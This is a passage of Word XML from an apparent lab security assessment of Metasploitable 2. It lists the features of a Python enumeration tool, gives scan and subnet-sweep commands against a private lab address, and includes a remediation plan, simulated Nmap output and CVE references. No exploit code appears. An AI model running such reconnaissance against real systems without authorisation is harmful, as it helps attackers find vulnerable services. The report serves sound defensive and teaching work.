        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.1 Features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Multi-threaded TCP port scanner with configurable threads and timeout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Banner grabbing for service version fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FTP enumerator with anonymous login detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SSH enumerator with version analysis and outdated-version detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP enumerator with security header analysis and path probing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB enumerator with SMBv1 negotiation probing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability analyser mapping findings to CVE signatures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CIDR host discovery (ping sweep) mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JSON and CSV report export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Colour-coded terminal output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Zero external dependencies — pure Python standard library</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.2 Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The tool is structured as a single-file Python module with modular class-based components:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Class / Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PortScanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ThreadPoolExecutor-based TCP connect scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BannerGrabber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Per-port probe dict with raw socket recv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FTPEnumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FTP anonymous login and SYST enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSHEnumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH protocol banner and version analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTPEnumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTP HEAD requests, header and path analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SMBEnumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>NetBIOS/SMB port probing and v1 negotiate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VulnerabilityAnalyser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Maps open ports + enum data to vuln signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.3 Usage Examples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Scan common ports against a target</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python3 netscout.py -t 192.168.56.101</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Top-1000 port scan with 200 threads</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python3 netscout.py -t 192.168.56.101 -p top --threads 200</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Export JSON + CSV reports</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python3 netscout.py -t 192.168.56.101 --json report.json --csv report.csv</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Subnet host discovery sweep</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python3 netscout.py -t 192.168.56.0/24 --sweep</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Repository: github.com/intern/netscout   |   Tests: 20 unit tests, all passing (stdlib unittest)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>9. Recommendations &amp; Remediation Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following prioritised remediation actions are recommended, ordered by severity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IMMEDIATE (24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Upgrade or replace vsFTPd 2.3.4 — apply CVE-2011-2523 patch or switch to ProFTPD/Pure-FTPd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Upgrade Samba from 3.0.20 to 4.x LTS — eliminates CVE-2007-2447 RCE vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Disable Telnet service — enable and enforce SSH-only remote access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHORT TERM (1 week)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Disable anonymous FTP — set anonymous_enable=NO in vsftpd.conf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Apply SMBv1 disable policy — add 'min protocol = SMB2' in smb.conf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enable firewall rules — restrict ports 21, 23, 139, 445 to authorised management IPs only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MEDIUM TERM (1 month)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Upgrade OpenSSH to 9.x — remove weak cipher suite support.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Configure HTTP security headers — add CSP, HSTS, X-Frame-Options, X-Content-Type-Options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set ServerTokens Prod in Apache — suppress version disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audit web applications at /mutillidae, /dvwa, /phpMyAdmin — patch or remove.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement network segmentation — isolate services into appropriate DMZ zones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4472C4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ONGOING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Establish patch management schedule — monthly OS and service updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deploy intrusion detection (Snort/Suricata) on perimeter and inter-segment links.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Conduct quarterly vulnerability scans and annual penetration tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement centralised logging (SIEM) for anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Train staff on security awareness — phishing, social engineering, credential hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This network security assessment of the Metasploitable 2 lab environment revealed a severely compromised security posture. Two critical Remote Code Execution vulnerabilities (CVE-2011-2523, CVE-2007-2447) were confirmed exploitable, granting unauthenticated root access within seconds of initial reconnaissance. Combined with anonymous FTP access, active Telnet, outdated SSH, and verbose HTTP headers, the target exemplifies nearly every common network security misconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>From a learning perspective, this exercise demonstrated the complete attack lifecycle: reconnaissance → enumeration → exploitation — and reinforced the criticality of patch management, service hardening, and defence-in-depth. The NetScout tool developed for this assessment provides a reusable, open-source foundation for future enumeration tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>All findings are reproducible within the lab environment and have been documented with sufficient evidence for remediation verification. Implementing the recommendations in Section 9 would eliminate all critical and high-severity findings identified in this report.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Appendix A — Raw Nmap Scan Output (Simulated)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Nmap 7.94 scan report for 192.168.56.101</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Host is up (0.00035s latency).</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE     VERSION</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>21/tcp   open  ftp         vsftpd 2.3.4</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>23/tcp   open  telnet      Linux telnetd</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>25/tcp   open  smtp        Postfix smtpd</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>53/tcp   open  domain      ISC BIND 9.4.2</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OS details: Linux 2.6.9 - 2.6.33</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Appendix B — References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2011-2523: https://nvd.nist.gov/vuln/detail/CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2007-2447: https://nvd.nist.gov/vuln/detail/CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2017-0143 (EternalBlue): https://nvd.nist.gov/vuln/detail/CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2018-15473 (OpenSSH): https://nvd.nist.gov/vuln/detail/CVE-2018-15473</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nmap Reference Guide: https://nmap.org/book/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OWASP Testing Guide v4.2: https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NIST SP 800-115: Technical Guide to Information Security Testing and Assessment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